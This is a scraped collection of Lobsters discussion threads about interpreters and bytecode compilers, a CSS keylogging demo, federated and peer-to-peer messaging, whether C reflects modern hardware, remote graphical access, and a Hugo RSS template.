1.  

    Another example that might not completely count: Mono re-added its interpreter; while it does have a JIT/AOT mode it primarily uses, the interpreter is useful in contexts like reflection on restrictive platforms (cough, iOS) or the cases where compiler latency causes something to be slower than just interpreting the IL.

    1. 11

      Awk and the various members of the Unix shell family?

      1. 6

        Yup, I’ve looked at at 5-10 shell implementations, and all of them are essentially AST interpreters + on-the-fly parsing/evaluating.

        Just like Ruby was an AST interpreter that recently became a bytecode interpeter, R made the same jump recently:

        A byte code compiler for R

        https://scholar.google.com/scholar?cluster=1975856130321003102&hl=en&as_sdt=0,5&sciodt=0,5

        1. 1

          Do you happen to know how recently they’ve switched? (And an example of a large project written purely (or almost purely) in that language?) Thanks.

          1. 5

            Ruby switched in 2007, i used it for a few years before that and the speedups were quite dramatic. See https://en.wikipedia.org/wiki/YARV for a bit more info.

            1.  

              Cool! That links to some benchmarks which saves me from trying to do them.

              Looks like its only about 4x on average which is hopeful (for having no bytecode).

            2.  

              It looks like it’s around R release 2.13 and 2.14, which was around 2011. R is from the early/mid 90’s, similar to Ruby, and I think they both switched to bytecode compilers at around the same time.

              https://csgillespie.github.io/efficientR/7-4-the-byte-compiler.html

              https://cran.r-project.org/src/base/R-2/

              R is for data analysis, so it’s hard to say what a “large project” is. It’s also a wrapper around Fortran numeric libraries in the same way Python is a wrapper around C (or NumPy is a wrapper around Fortran.)

              There are thousands of libraries written in R:

              https://cran.r-project.org/web/packages/available_packages_by_date.html

              1.  

                Thanks! This actually looks like a pretty good example. That website even lists package dependencies so I can try to find a long chain of pre-2011 dependencies.

          2. 4

            Unix shell, for sure. GNU awk and mawk compile to bytecode. Not sure about nawk, though the regexp implementation in nawk uses bytecode.

            1.  

              GNU awk and mawk compile to bytecode

              Really? That seems wierd, since gawk is both slower than nawk and mawk. Or is it because of the features the GNU project added, that it’s overall slower?

              1. 6

                One big difference is that gawk operates on sequences of Unicode characters, while mawk and nawk operate on sequences of bytes. If your text is all ASCII, setting your locale to ‘C’ will cause gawk to also operate on bytes, which should close at least some of the performance gap. But gawk’s Unicode support can be nice if you have UTF-8. mawk and nawk will often still produce the right result on UTF-8 input, especially when non-ASCII characters are only passed through unmodified. But sometimes you get:

                $ echo $LANG
                en_GB.UTF-8
                $ echo "ÜNICÖDE" | gawk '{print tolower($0)}'
                ünicöde
                $ echo "ÜNICÖDE" | nawk '{print tolower($0)}'
                �nic�de
                $ echo "ÜNICÖDE" | mawk '{print tolower($0)}'
                �nic�de
                
            2. 1

              Thanks for the example. I don’t know how they work internally. Although to me, they are in the write-more-primitives-in-a-faster-language category. The primitives being the external commands called (maybe awk a bit less?).

              Are there examples of multi-layered library (or use) for awk and shell?

              Edit: typo

              1. 2

                What does “multi-layered push” mean?

                As for awk, when I use it, I never shell out. If I need to shell out from awk, I just write the whole thing in Go or something. So I just use the primitives exposed by awk. Though, before Go, I shelled out of awk more often.

                1. 1

                  multi-layered push

                  Oops, that’s the wrong words. That’s what I get for alt-tabbing between the comment window and a shell.

                  I mean something like calling a library which calls another library which calls another library, with all intermediate libraries written in awk (or shell). (Or the same thing with functions if there are layers one on top of each other. By this I mean functions in one layer treats functions in the previous layer as primitives).

                  As for awk, when I use it, I never shell out.

                  That would be a good example then if you also have at least two layers of functions (although more would be nice).

            1. 1

              There’s a lot of browser specific setup and a whole nodejs server included in this. I would not qualify this as “pure” CSS keylogging. Neat stuff though!

              1. 2

                The actual keylogging inside is done inside of CSS; you’d still need something to exfiltrate it with.

                1. 2

                  No it isn’t, it relies on JavaScript to update the DOM, which is read by the CSS. This is a JavaScript keylogger that uses CSS and the DOM for exfiltration, when it could just as easily use XMLHttpRequest.

                  1. 2

                    It works if you can get style injection on a site already using JS to update the .value, though. (e.g. React)

                    1. 1

                      I think, in that situation, React is the keylogger.

                      1. 1

                        Sure - but it’s a pretty widely installed one.

              1. 5

                So true:

                They [Google] released sample implementations under open source licenses, encouraged others to run their own Wave servers independent of Google infrastructure, and defined a federation protocol (on top of Jabber/XMPP) so that people on different servers could still talk with each other.

                This seems weird, a decade later, when Google and Facebook are each trying to get everyone into their walled gardens so they can serve ads to you.

                1. 5

                  Back then, Facebook and Google were using XMPP for them IM services - now look at the mess we have…

                  1. 1

                    I liked that you did not need a Facebook or Google account to speak with their victims. :(

                    1. 1

                      Well, Facebook didn’t federate.

                  1. 2

                    Seems like a new p2p messaging app pops up every year. I wish you luck but I can’t see it even passing tox which is fairly unusable.

                    1. 25

                      Agreed, but it’s fun to work on.

                      1. 23

                        THIS is the mentality I admire. Every time I come up with a new project and want to show it off, I’m inundated with “yeah, but X already exists! Why would you make another one?” Because it’s fun! Because I want my own! Because I want to write code!

                        Keep it up, it’s a cool project.

                        1. 12

                          Thank you! Having my own project like this to refactor and perfect allows me to stay sane in the business-focused “it ain’t broke” environment of the real world.

                        2. 8

                          I love this mentality and that’s why I wrote my own p2p chat app too.

                          The most fun part was learning how to punch through firewalls, building messaging on top of UDP, and encryption.

                          Learning is best done through doing.

                          Question , what encryption does your chat app use?

                          1. 3

                            None whatsoever 🙊. All messages are transmitted in the clear right now, to obvious peril. Another goal I’d like to hit is implementing end-to-end encryption I’m interested in using libsignal, but don’t know enough about it to know if it’s applicable in a p2p protocol like this.

                            1. 2

                              I’d like to see yours too if you want to share.

                              1. 1

                                I haven’t worked on it in like a year, though recently started doing some C++17 revamp. It’s called Fire★. It’s interesting that you chose GTK, any reason to pick that over something like Qt?

                                1. 1

                                  None other than that the Rust bindings looked mature and are easy enough to work with. I actually started by wrapping it with Swift and making an iOS app. I made some progress but it was pretty hard to maintain the Swift wrapper, wrapping a C interface, wrapping the actual library.

                                  Fire(star) looks pretty cool. Next time I have some free time with my laptop I want to play around with it.

                                  1. 2

                                    Interesting, hopefully the Rust people will get decent Qt bindings. Qt is pretty damn great. If you ever do play with Firestr, PM me your ID and I’ll send you mine.

                          2. 3

                            what’s wrong with tox?

                            1. 3

                              Nothing that I know of.

                              1. 2

                                Last I saw which was a little while ago, It didn’t work well at all on mobile because you need a constant connection to the network which drains your battery and data real fast. Matrix looks a lot more promising for real use.

                                1. 1

                                  does matrix have video chat?

                                  1. 1

                                    It does. It has almost all the features of things like discord and slack but they need to be polished more and sped up.

                                2. 1

                                  Doesn’t Tox have occasional developer drama every so often?

                                3. 1

                                  Can you clarify what Tox is and, more importantly, why you think it wouldn’t pass?

                                  I think you mean “be better than Tox [another messaging system], which has its own usability problems”.

                                  1. 2

                                    Tox is another P2P messaging system. The Qt client is a little wonky, and I remember having issues when trying to do group chat. Beyond that, it was really nice to use, and the voice chat functionality was surprisingly great. The last time I used Tox was maybe 2014 so maybe it’s changed since then. I think the main thing Tox has going for it ahead of other P2P systems is that it’s relatively popular and well-known.

                                1. 3

                                  I mean, if you’re running as a native app, you could at least run faster mining code than in JavaScript.

                                  1. 1

                                    Yeah but the JS code is already written. I don’t think these people are out there improving their programming chops.

                                  1. 22

                                    This article is great except for No 3: learning how hardware works. C will teach you how PDP-11 hardware works with some extensions, but not modern hardware. They have different models. The article then mentions computer architecture and assembly are things they teach students. Those plus online articles with examples on specific topics will teach the hardware. So, they’re already doing the right thing even if maybe saying the wrong thing in No. 3.

                                    Maybe one other modification. There’s quite a lot of tools, esp reimplementations or clones, written in non-C languages. Trend started getting big with Java and .NET with things like Rust and Go making some more waves. There’s also a tendency to write things in themselves. I bring it up because even the Python example isn’t true if you use a Python written in Python, recent interpreter tutorials in Go language, or something like that. You can benefit from understanding the implementation language and/or debugger of whatever you’re using in some situations. That’s not always C, though.

                                    1. 14

                                      Agreed. I’ll add that even C’s status as a lingua franca is largely due to the omnipresence of unix, unix-derived, and posix-influenced operating systems. That is, understanding C is still necessary to, for example, link non-ruby extensions to ruby code. That wouldn’t be the case if VMS had ended up dominant, or lisp machines.

                                      In that way, C is important to study for historical context. Personally, I’d try to find a series of exercises to demonstrate how much different current computer architecture is from what C assumes, and use that as a jumping point to discuss how relevant C’s semantic model is today, and what tradeoffs were made. That could spin out either to designing a language which maps to today’s hardware more completely and correctly, or to discussions of modern optimizing compilers and how far abstracted a language can become and still compile to efficient code.

                                      A final note: no language “helps you think like a computer”. Our rich history shows that we teach computers how to think, and there’s remarkable flexibility there. Even at the low levels of memory, we’ve seen binary, ternary, binary-coded-decimal, and I’m sure other approaches, all within the first couple decades of computers’ existence. Phrasing it as the original author did implies a limited understanding of what computers can do.

                                      1. 8

                                        C will teach you how PDP-11 hardware works with some extensions, but not modern hardware. They have different models.

                                        I keep hearing this meme, but pdp11 hardware is similar enough to modern hardware in every way that C exposes. Except, arguably, with the exception of NUMA and inter-processor effects.

                                        1. 10

                                          You just countered it yourself even with that given prevalence of multicores and multiprocessors. Then there’s cache hierarchies, SIMD, maybe alignment differences (memory is fuzzy), effects of security features, and so on.

                                          They’d be better of just reading on modern, computer hardware and ways of using it properly.

                                          1. 6

                                            Given that none of these are represented directly in assembly, would you also say that the assembly model is a poor fit for modeling modern assembly?

                                            I mean, it’s a good argument to make, but the attempts to make assembly model the hardware more closely seem to be vaporware so far.

                                            1. 6

                                              Hmm. They’re represented more directly than with C given there’s no translation to be done to the ISA. Some like SIMD, atomics, etc will be actual instructions on specific architectures. So, Id say learning hardware and ASM is still better than learning C if wanting to know what resulting ASM is doing on that hardware. Im leaning toward yes.

                                              There is some discrepency between assembly and hardware on highly-complex architectures, though. The RISC’s and microcontrollers will have less, though.

                                          2. 1

                                            Not helped by the C/Unix paradigm switching us from “feature-rich interconnected systems” like in the 1960s to “fast, dumb, and cheap” CPUs of today.

                                          3. 2

                                            I really don’t see how C is supposed to teach me how PDP-11 hardware works. C is my primary programming language and I have nearly no knowledge about PDP-11, so I don’t see what you mean. The way I see it is that the C standard is just a contract between language implementors and language users; it has no assumptions about the hardware. The C abstract machine is sufficiently abstract to implement it as a software-level interpreter.

                                            1. 1

                                              As in this video of its history, the C language was designed specifically for the hardware it ran on due to its extremely-limited resources. It was based heavily on BCPL, which invented “programmer is in control,” that was what features of ALGOL could compile on another limited machine called an EDSAC. Even being byte-oriented versus word-oriented was due to PDP-7 being byte-oriented vs EDSAC that allowed word-oriented. After a lot of software was written in it, two things happened:

                                              (a) Specific hardware implementations tried to be compatible to it in stack or memory models so that program’s written for C’s abstract machine would go fast. Although possibly good for PDP-11 hardware, this compatibility would mean many missed opportunities for both safety/security and optimization as hardware improved. These things, though, are what you might learn about hardware studying C.

                                              (b) Hardware vendors competing with each other on performance, concurrency, energy usage, and security both extended their architectures and made them more heterogenous than before. The C model didn’t just diverge from these: new languages were invented (esp in HPC) so programmers could easily use them via something that gives a mental model closer to what hardware does. The default was hand-coded assembly that got called in C or Fortran apps, though. Yes, HPC often used Fortran since it’s model gave them better performance than C’s on numerical applications even on hardware designed for C’s abstract machine. Even though easy on hardware, the C model introduced too much uncertainty about programmers’ intent for compilers to optimize those routines.

                                              For this reason, it’s better to just study hardware to learn hardware. Plus, the various languages either designed for max use of that hardware or that the hardware itself is designed for. C language is an option for the latter.

                                              “ it has no assumptions about the hardware”

                                              It assumes the hardware will give people direct control over pointers and memory in ways that can break programs. Recent work tries to fix the damage that came from keeping the PDP-11 model all this time. There were also languages that handled them safely by default unless told otherwise using overflow or bounds checks. SPARK eliminated them for most of its code with compiler substituting pointers in where it’s safe to do so. It’s also harder in general to make C programs enforce POLA with hardware or OS mechanisms versus a language with that generated for you or having true macros to hide boilerplate.

                                              “ The C abstract machine is sufficiently abstract to implement it as a software-level interpreter.”

                                              You can implement any piece of hardware as a software-level interpreter. It’s just slower. Simulation is also a standard part of hardware development. I don’t think whether it can be interpreted matters. Question is: how much does it match what people are doing with hardware vs just studying hardware, assembly for that hardware, or other languages designed for that hardware?

                                              1. 3

                                                I admit that the history of C and also history of implementations of C do give some insight into computers and how they’ve evolved into what we have now. I do agree that hardware, operating systems and the language have been all evolving at the same time and have made impact on each other. That’s not what I’m disagreeing with.

                                                I don’t see a hint of proof that knowledge about the C programming language (as defined by its current standard) gives you any knowledge about any kind of hardware. In other words, I don’t believe you can learn anything practical about hardware just from learning C.

                                                To extend what I’ve already said, the C abstract machine is sufficiently abstract to implement it as a software interpreter and it matters since it proves that C draws clear boundaries between expected behavior and implementation details, which include how a certain piece of hardware might behave. It does impose constraints on all compliant implementations, but that tells you nothing about what “runs under the hood” when you run things on your computer; an implementation might be a typical, bare-bones PC, or a simulated piece of hardware, or a human brain. So the fact that one can simulate hardware is not relevant to the fact, that you still can’t draw practical assumptions about its behavior just from knowing C. The C abstract machine is neither hardware nor software.

                                                Question is: how much does it match what people are doing with hardware vs just studying hardware, assembly for that hardware, or other languages designed for that hardware?

                                                What people do with hardware is directly related to knowledge about that particular piece of hardware, the language implementation they’re using, and so on. That doesn’t prove that C helps you understand that or any other piece of hardware. For example, people do study assembly generated by their gcc running on Linux to think about what their Intel CPU will do, but that kind of knowledge doesn’t come from knowing C - it comes from observing and analyzing behavior of that particular implementation directly and behavior of that particular piece of hardware indirectly (since modern compilers have to have knowledge about it, to some extent). The most you can do is try and determine whether the generated code is in accordance with the chosen standard.

                                                1. 1

                                                  In that case, it seems we mostly agree about its connection to learning hardware. Thanjs for elaborating.

                                          1. 5

                                            Coming from the DM, I had a hard time finding the gofundme link. Just in case others are as dense as I am, here it is: https://www.gofundme.com/lobsters-emoji-adoption

                                            1. 2

                                              It took me a moment to realize the link is the story link for this story. I’m just not used to seeing the announce tag on a link!

                                              1. 2

                                                Or on a primarily text post!

                                            1. 4

                                              -performance because she isn’t benchmarking code, but people!

                                              1. 1

                                                You’re right. Thank you!

                                              1. 5

                                                Siracusa’s articles like About the Finder… (and I believe Gruber too) have wrote about the reasons why the Mac OS X Finder is inferior to the predecessor on the classic Mac before it, if you’d like some grounding.

                                                1. 4

                                                  So many layers of complex technology created only to circumvent Apple’s political restrictions. Why they still ban JITs and GCs in 2018? And this is on “devices of future” intended to “replace desktop computers”.

                                                  1. 4

                                                    Because technically, JITs are very easy to exploit; and politically, it makes it easy to build parallel ecosystems.

                                                  1. 10

                                                    Yeah, it did. And that’s unfortunate, because the ability to interact with a remote computer graphically as easily as you can with ssh would have been very useful. “Most people only ever interact with remote machines with either text mode SSH or a browser talking to a web server on the remote machine.” says the article, and indeed a web browser talking to a server on the remote machine is basically how one interacts with a remote computer graphically nowadays. This is wildly popular, of course, but is it the best possible world? Probably not.

                                                    1. 5

                                                      If you want to do that, RDP is actually well implemented and works for such purposes, on the Windows side.

                                                      1. 6

                                                        Unfortunately, there are a lot of “RDP hostile” applications these days – many of them from Microsoft themselves! For example, using Skype for text chat over RDP is quite painful now.

                                                        1. 1

                                                          Not only on the Windows side. FreeRDP is very good too.

                                                      1. 9

                                                        My Mono patchset is likely getting merged upstream. So far I can run things like ASP.NET and old IRC bots of mine, but on weird IBM midrange systems.

                                                        1. 11

                                                          I think I would have preferred the source code….

                                                          1. 3

                                                            I could go either way on this. On the one hand, our intellectual property laws are horrible, and the game is 20 yrs old, so who cares?

                                                            But, on the other, I’d be pissed if I lost my camera and someone decided to dump the contents on imgur.

                                                            I think the reason there is any debate around this is because the owner is a giant, and successful game corporation, which seemingly has nothing to lose from sharing the source. But if that were actually true, why wouldn’t they on their own terms?

                                                            1. 9

                                                              Many game publishers would rather have their game rot into obscurity and make no profits than share the code. Abandonware is so common these days. I think it’s mostly rooted in a bad theoretical perspective of how the software market works.

                                                              1. 2

                                                                According to an IP lawyer friend of mine, software companies are often afraid that if their source gets out it will more likely be discovered that they accidentally infringed someone else’s IP in ways they weren’t even aware of.

                                                                1. 1

                                                                  This is the reason for most of the NDA’s in the hardware industry. It’s a patent minefield. Any FOSS hardware might get taken down. I don’t know as much about the software industry except that big players like Microsoft and Oracle patent everything they can. A quick Google looking for video game examples got me this article. Claims included in-game directions, d-pad, and unlocking secrets but I haven’t vetted this article’s claims by reading the patents or anything.

                                                                2. 1

                                                                  Many game publishers would rather have their game rot into obscurity and make no profits than share the code.

                                                                  I think it comes down to thing, actually: Do you believe in the betterment of society (sharing), or do you believe in maximizing profits (greed)? In the last 20 years, we’ve seen this go from strictly white and black, to a full color spectrum. Blizzard, even Microsoft, are somewhere in the middle, but neither of them have shared much of their core, profit producing, products.

                                                                  I think it’s mostly rooted in a bad theoretical perspective of how the software market works.

                                                                  Can you clarify a bit? I think what you’re saying might be similar to what I’m thinking… that the media industries have not yet adapted from “copies” sold as a metric of success, despite tons of evidence and anecdotes suggesting other ways to success.

                                                                  1. 1

                                                                    We’re saying the same thing yes. It’s hard for businesses to realize that price discrimination can go down to $0 and you can still make a hearty profit.

                                                                3. 1

                                                                  I bet there’s a lot of code in there that’s still heavily used in their games today, so probably not accurate to say they have nothing to lose.

                                                                  1. 1

                                                                    One would imagine! Though, the engines of 1998 vs. the engines of 2018 have probably changed quite significantly.

                                                              1. 2

                                                                I thought some of you might have never heard of this concept. Here’s the PCI version I’m really focusing on. Thought it better to submit where it started then add that. The problem was the UNIX workstations, thought to be better in many ways, couldn’t run the PC software people were getting locked-in to. Instead of regular virtualization, Sun had the clever idea to straight-up put PC hardware in their UNIX boxes to run MS-DOS and then I think Windows apps. Early PS3’s did something similar keeping a PS2 Emotion Engine in them for emulation. I can’t recall others off top of head, though.

                                                                The reason I’m posting this is that we’re currently trying to escape x86 hardware in favor of RISC-V and other stuff. My previous solution was two boxes in one chassis with KVM switch. That might be too much for some users. I figured this submission might give people ideas about using modern, card computers… which have usable specs… with FOSS workstations to run the legacy apps off the cards. The FOSS SoC, esp its IOMMU, might isolate them in shared RAM from the rest of the system. It would also run apps from the shared hard drive in a way that was mediated. There should also be software that can seemlessly move things into or out of the system but with trusted part running on FOSS SoC. It could even be a hardware component managed by trusted software if wanting a speed boost and possible reduction in attack surface.

                                                                1. 3

                                                                  I think you might be misreading - the 386 in the Sun386i is the only CPU - there’s no SPARC, it runs an x86 Solaris with DOS VDMs provided by V86 mode on the 386.

                                                                  PC-on-cards were somewhat popular with Macs before software emulation in the late 90s got good enough.

                                                                  1. 1

                                                                    To be extra clear, this is what my comment is about. It’s a PCI card that runs x86 software alongside Solaris/SPARC. I found other one searching for it. If they’re unrelated, then my bad, thanks for tip, and lets explore the PCI card concept for x86 and RISC-V.

                                                                  2. 1

                                                                    There should also be software that can seemlessly move things into or out of the system but with trusted part running on FOSS SoC.

                                                                    I know it is proprietary, but wouldn’t the Apple T1 in the MacBook Pro Retina and T2 in the iMac Pro be good examples as well?

                                                                    https://en.wikipedia.org/wiki/Apple-designed_processors#Apple_T1

                                                                    tl;dr: T1/T2 is a separate ARM SoC that acts as a secure enclave and is a gatekeeper for the mic and Facetime camera.

                                                                  1. 1

                                                                    Is this a press release or “please come work here” post?

                                                                    Also, what is Matrix and what does it do?

                                                                    1. 2

                                                                      Basically IRC or XMPP, (federated chat) but with JSON.

                                                                    1. 2

                                                                      This seems like spam to me?

                                                                      They’ve copy pasted the advisory and put a very stupid title on it. “Ugly, perfect ten-rated bug”, “patch before they’re utterly p0wned”, “btw it’s a denial of service attack”.

                                                                      No thanks.

                                                                      1. 2

                                                                        It’s The Register; the self-admitted British tabloid (like the Daily Mail) of the IT world. Sometimes they can produce a good article, othertimes it’s clickbait where you’re also expecting page 3 to be a naked woman.

                                                                        1. 1

                                                                          This vulnerability can “allow the attacker to execute arbitrary code and obtain full control of the system,” it’s not just a DoS.

                                                                          https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

                                                                        1. 12

                                                                          I’d prefer it if there was no design. Just the content.

                                                                          1. 16

                                                                            Which you get with a (full) RSS feed.

                                                                            1. 7

                                                                              Yup!

                                                                              Take care if you use hugo, the default rss template does not render the full article.

                                                                              Here’s a modified one that renders the full article in the feed:

                                                                              <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
                                                                                <channel>
                                                                                  <title>{{ .Title}} </title>
                                                                                  <link>{{ .Permalink }}</link>
                                                                                  <description>Recent posts</description>
                                                                                  <generator>Hugo -- gohugo.io</generator>{{ with .Site.LanguageCode }}
                                                                                  <language>{{.}}</language>{{end}}{{ with .Site.Author.email }}
                                                                                  <managingEditor>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</managingEditor>{{end}}{{ with .Site.Author.email }}
                                                                                  <webMaster>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</webMaster>{{end}}{{ with .Site.Copyright }}
                                                                                  <copyright>{{.}}</copyright>{{end}}{{ if not .Date.IsZero }}
                                                                                  <lastBuildDate>{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}</lastBuildDate>{{ end }}
                                                                                  {{ with .OutputFormats.Get "RSS" }}
                                                                                      {{ printf "<atom:link href=%q rel=\"self\" type=%q />" .Permalink .MediaType | safeHTML }}
                                                                                  {{ end }}
                                                                                  {{ range .Data.Pages }}
                                                                                  <item>
                                                                                    <title>{{ .Title }}</title>
                                                                                    <link>{{ .Permalink }}</link>
                                                                                    <pubDate>{{ .Date.Format "Mon, 02 Jan 2006 15:04:05 -0700" | safeHTML }}</pubDate>
                                                                                    {{ with .Site.Author.email }}<author>{{.}}{{ with $.Site.Author.name }} ({{.}}){{end}}</author>{{end}}
                                                                                    <guid>{{ .Permalink }}</guid>
                                                                                    <description>{{ .Content | html }}</description>
                                                                                  </item>
                                                                                  {{ end }}
                                                                                </channel>
                                                                              </rss>
                                                                              

                                                                              I probably should have included that in the article… Too late now.

                                                                              1. 3

                                                                                Why is it too late now?

                                                                                1. 5

                                                                                  I was about to answer laziness and realized this is not something that should be celebrated.

                                                                                  It’s now included.

                                                                                  1. 1

                                                                                    Thank you for adding it, it will be handy for me when I go back to your post in a few weeks and look for how to do this. :)

                                                                              2. 1

                                                                                Blogs should just be an XSLT transform applied to RSS ;)

                                                                              3. 2

                                                                                The built-in Firefox Reader mode is a godsend. I feel much more comfortable reading long texts in the same font, page width, background color + the scrollbar on the right now gives me a pretty good estimate of reading time.

                                                                                1. 1

                                                                                  Weirdly, though, that all comes down to the good design of Firefox reader mode :D.

                                                                                2. 1

                                                                                  RSS, lightweight versions (light.medium.com/usual/url ?), heck even gopher, perfectly does the job! we need these things.

                                                                                1. 1

                                                                                  Working on porting some software to PASE - I’m doing pretty good for someone who’s never used AIX before and with no knowledge of POWER assembler; just applying my knowledge of hacking around old commercial Unix and codebase familiarity. We’re a lot further in that we thought we’d be! The big problem is toolchain, where the readymade ones kinda suck, so we’re tempted to build one ourselves. (The problem there is, GCC is a monster to build and may assume some things that don’t exist. LLVM doesn’t seem much better, if it’s even compatible at all.)